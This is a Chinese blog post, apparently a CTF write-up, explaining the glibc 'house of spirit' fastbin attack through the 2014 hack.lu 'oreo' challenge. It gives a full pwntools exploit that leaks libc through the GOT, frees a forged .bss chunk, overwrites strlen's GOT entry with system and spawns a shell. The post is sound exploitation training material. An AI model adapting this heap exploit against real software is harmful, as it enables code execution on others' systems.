2014 hack.lu oreo house of sprit

最新推荐文章于 2022-07-19 20:08:09 发布
最新推荐文章于 2022-07-19 20:08:09 发布
阅读量216 收藏
点赞数
分类专栏: PWN 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/122922699
版权

什么是house of spirit?

简单说一下我自己的理解,详细的可以看wiki。

其核心在于在一个任意可写或间接可写的位置伪造一个fake_chunk,然后通过释放该fake_chunk,即可将该fake_chunk连入fastbin中,通过malloc达到分配指定地址chunk的目的。

看道例题:2014 hack.lu oreo

漏洞点:存在堆溢出,chunk未完全free

利用思路:

1.泄露libc: add一个chunk,并且将该chunk的第13个地址位改为任意函数的got表地址,即可泄露libc的基地址

2.构造fake_chunk: 题目中有个在bss段写入数据的函数,并且存在一个指针,这个指针指向0x804a2c0,通过控制fakegun_num,构造fake_chunk,那么下次malloc时,我们就可以编辑fake_chunk从而达到任意地址写的目的。

3.随后修改got表即可getshell

 exp:

from pwn import *
p = process("./oreo")
e = ELF("./oreo")
libc = e.libc
p.timeout = 0.01
context.log_level ="debug"
num_addr = 0x804a2a8
def add(name,desc):
	p.recvuntil("Action: ")
	p.sendline("1")
	p.recvuntil("Rifle name: ")  
	p.sendline(name)
	p.recvuntil("Rifle description: ")
	p.sendline(desc)

def show_add():
	p.recvuntil("Action: ")
	p.sendline("2")

def free():
	p.recvuntil("Action: ")
	p.sendline("3")
def edit_bss(content):
	p.recvuntil("Action: ")
	p.sendline("4")
	p.sendline(content)
def show_stats():
	p.recvuntil("Action: ")
	p.sendline("5")
def dbg():
	gdb.attach(p)
	pause()
pl1 = 'a'*(3+20+4)+ p32(e.got['puts'])
add(pl1,'b'*4)
show_add()
p.recvuntil("Description: bbbb\n")
p.recvuntil("Description: ")
puts_addr = u32(p.recv(4))
libc_base = puts_addr - libc.sym["puts"]
sys = libc_base + libc.sym['system']
sh = libc_base  + next(libc.search("/bin/sh"))
log.success("puts_addr: "+hex(puts_addr))
count = 1
while (count < 0x40-1):
	add('a'*4,'b'*4)
	count+=1
add("a"*(27)+p32(0x804a2a8),"b"*4)
pl2 = '\x00'*(0x20) + p32(0x40) + p32(0x100)
edit_bss(pl2)
free()
pl3 = p32(e.got["strlen"]).ljust(20,'a')
add('a'*(20),pl3)
gad = libc_base + 0x3ac6c
edit_bss(p32(sys)+";/bin/sh\x00")

p.interactive()

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Android Oreo8.0.rar
07-11
Android 8.0的NotoColorEmoji.ttf文件,push进自己android的/system/fonts目录替换,可以使手机显示Android 8.0风格的emoji。 注意:解压后需要修改修改文件名为NotoColorEmoji.ttf,并且记得备份原文件,以备...
linux 堆溢出学习之house of spirit(1) malloc maleficarum hos翻译
jmp esp
03-02 2243
综述house of spirit是一种常用的堆溢出技术,而在如今的malloc实现中依然没有对这种方法进行保护,所以在目前还是一种有效的堆溢出技术。下面我们先从这种方法的来源之本讲起,即2005 Malloc Maleficarumcsdn原文 The House of SpiritThe House of Spirit is primarily interesting because of th
fastbin attack
m0_64195960的博客
07-19 1391
FastbinDoubleFree是指fastbin的chunk可以被多次释放,因此可以在fastbin链表中存在多次。这样导致的后果是多次分配可以从fastbin链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆(typeconfused)的效果。FastbinDoubleFree能够成功利用主要有两部分的原因fastbin的堆块被释放后next_chunk的pre_inuse位不会被清空1.1.1该技术的核心。......
2014 hack.lu oreo
coco的博客
11-25 386
程序分析 这是一个经典的菜单程序 checksec add函数 建立了一个rifle结构体。 struct rifle { description //从0字节开始 name //从25字节开始 pre_rifle_ptr //从52字节开始 } //总共56字节 并且注意到description和name都能读入56个字节,也就是说pre_rifle_ptr是能被完全控制的。 并且有一...
House of Spirit学习调试验证与实践
xiaoi123的博客
08-07 1127
作家:Bug制造机 原文来自:House of Spirit学习调试验证与实践 House of Spirit和其他的堆的利用手段有所不同。它是将存在的指针改写指向我们伪造的块(这个块可以位于堆、栈、bss任何一个位置)并且free掉欺骗glibc达到把伪造块回收到bins中不过在free之前,需要设置当前伪造块和下一个伪造块的size字段,满足free()的安全检测机制,从而欺骗glibc。...
2014 hack.lu——oreo
04-19 230
32位程序,没开PIE   #House Of Spirit 需要注意的是,该程序并没有进行 setvbuf 操作,因此在初次执行 io 函数时,会在堆上分配空间。 程序逻辑 1 unsigned int sub_804898D() 2 { 3 unsigned int v1; // [esp+1Ch] [ebp-Ch] 4 5 v1 =...
Oreo支付系统.rar
02-25
支付系统,内置多个首页模板。安装简单。仅供学习
2022全新Oreo支付系统平台开源版源码
05-18
OREO支付系统是一个安全、可靠、专业、强大的免签约支付接口系统源码,采用了群集服务器,不仅防御高,故障率也相对来说低很多,资金平均停留的时间不超过12小时,所以您的资金安全 集合了微信官方+支付宝官方+易...
Oreo易支付开源版.zip
03-02
1、支持批量生成商户 2、支持各种程序对接 3、支付查看订单信息 4、可以自定义网站信息 5、自带开发文档和对接官方和第三方支付的SDK 6、即时到账功能,别家的是没有的哦。...7、支持QQ、支付宝快捷登录功能。...
基于PHP的Oreo易支付开源版.zip
07-22
基于PHP的Oreo易支付开源版.zip
house_of_spirit && 2014_hack.lu_oreo例题分析
Pwnpanda的博客
08-13 1218
2014_hack.lu_oreo 相关知识点: Fastbin Attack – House of Spirit 相关链接: 2014_hack.lu_oreo下载 CTF Wiki Fastbin Attack IDA创建结构体 题目分析: 先分析功能: ①添加枪支(add),这个地方会读取枪支的名字和描述,这是第一个难点,这个里面存在一个结构体(差点被坑死在这,为...
House of Spirit(fastbin)
weixin_30265171的博客
07-14 155
0x01 fastbin fastbin所包含chunk的大小为16 Bytes, 24 Bytes, 32 Bytes, … , 80 Bytes。当分配一块较小的内存(mem<=64 Bytes)时,会首先检查对应大小的fastbin中是否包含未被使用的chunk,如果存在则直接将其从fastbin中移除并返回;否则通过其他方式(剪切top chunk)得到一块符合大小要求的chunk...
pwn工具箱之house of spirit
jmp esp
07-03 916
house of spirit基本信息 利用种类:堆利用 堆利用种类:释放fake chunk 利用思路:通过构造fake chunk,然后使得fake chunk被free,在下一次malloc时返回fake chunk 利用难点 需要能够控制被free的内容,才能构造fake chunk 在free fake chunk的时候,libc会检查next size,也就是从当前位置开始算,加上一个c
6.house_of_spirit
06-08 131
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 fprintf(stderr, "This file demonstrates the house of spirit attack.\n"); 7 8 fprintf(st...
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1622
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
[pwn][堆利用]house of spirit[例题:lctf2016_pwn200]
zhulintintao的博客
11-21 773
House of spirit 实现目的 malloc分配到目标地址 实现条件 free的参数可控 目标地址可以连续构造两个fake chunk的size域,需要地址对齐(即目标高低地址处均有可控区域) 实现方法 在目标地址伪造可以被释放到fastbin上的fake chunk 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域 将目标地址作为参数free malloc一次,将返回指向目标地址的指针 实现实例 题目平台 buuctf 题目名
PWN入门笔记 FastBinAttack+HouseOfSpirit+UnsortedBinLeak
cossack9989的博客
05-24 1503
好久没发文章了,从3月到5月所有学习记录全都存档在gitee上,包括本篇所有相关题目的exp,链接在此~ 接下来想讲一讲自己对FastBinAttack和HouseOfSpirit以及UnsortedBinLeak的认识,因为我发现这俩攻击方法和这一种泄露方法最近用的贼多(也很好用),与其说是Pwn Heap,不如说是Pwn Linked-List(手动狗头) FastBinAttack P...
linux 堆溢出学习之house of spirit(2)
jmp esp
03-02 945
开篇本篇接上篇的house of spirit技术的学习,上篇我们翻译了这个技术来源的文章,这篇我们将通过实例和总结来进行一个更深入的了解house of spirit 简介 攻击方式:结合栈溢出和堆溢出 攻击效果:返回任意位置作为一个chunk攻击要求: 可溢出控制某个malloc返回的地址 被控制的地址被free 再次malloc一个chunk 可对第二次分配的chunk进行输入 house o
PWN-HEAP学习】House of Spirit 学习笔记
SWEET0SWAT的博客
08-16 1335
House of Spirit 原理 l-ctf 2016 pwn200 调试分析 0x7ffd4a390b10: 0x0000000000000031 0x0000003000000001 0x7ffd4a390b20: 0x00007ffd4a390b40 0x00000000004009ff 0x7ffd4a390b30: 0x0000000000000005 0x0000000188ff...
genymotion-arm-translation-oreo-8.0.zip下载
最新发布
12-10
genymotion-arm-translation-oreo-8.0.zip是一个用于Genymotion模拟器的ARM翻译文件,适用于安卓8.0版本(代号为Oreo)的系统。这个翻译文件的作用是在Genymotion模拟器中支持安卓8.0系统的ARM架构。 想要下载...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值